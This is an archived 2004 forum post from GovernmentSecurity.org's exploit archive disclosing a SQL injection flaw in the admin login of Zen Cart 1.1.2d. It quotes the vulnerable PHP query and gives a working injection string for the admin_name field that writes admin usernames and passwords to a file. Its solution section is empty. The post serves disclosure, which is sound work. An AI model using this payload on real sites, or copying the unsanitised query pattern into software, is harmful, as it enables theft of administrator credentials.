Help
-
Search
-
Member List
-
Calendar
Full Version:
Zen Cart Bug
GovernmentSecurity.org
>
The Archives
>
Exploit Articles
qcred11
May 18 2004, 05:56 PM
QUOTE
Zen Cart - The art of E-Commerce
Version 1.1.2d
Found by: ruggine
1. Problem
2. Solution
3. Info
1. A remote user can inject SQL commands.
-----------
The bug is in the /admin/login.php file:
let's see the code:
if (isset($_POST['submit'])) {
$admin_name = zen_db_prepare_input($_POST['admin_name']);
$admin_pass = zen_db_prepare_input($_POST['admin_pass']);
$sql = "select admin_id, admin_name, admin_pass from " . TABLE_ADMIN . "
where admin_name = '" . $admin_name . "'";
$result = $db->Execute($sql);
It' possible to inject in $_POST['admin_name'] (for example) something
like this: ' or ''='' into outfile 'sample.txt
So it's possible to write a file with users and passwords.
-----------
2.
3. Vendor URL:
http://www.zen-cart.com
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here
.
Invision Power Board © 2001-2005
Invision Power Services, Inc.
